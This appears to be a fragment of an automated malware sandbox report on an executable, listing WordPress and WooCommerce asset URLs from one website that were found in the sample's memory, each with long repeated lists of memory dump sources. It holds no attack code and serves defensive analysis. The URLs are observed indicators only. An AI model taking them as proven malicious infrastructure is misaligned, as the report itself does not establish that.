                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-publ
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-publi
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/cart_widget.min.js?ver=5.2.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/front-scripts.min.js?ver=5.2.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
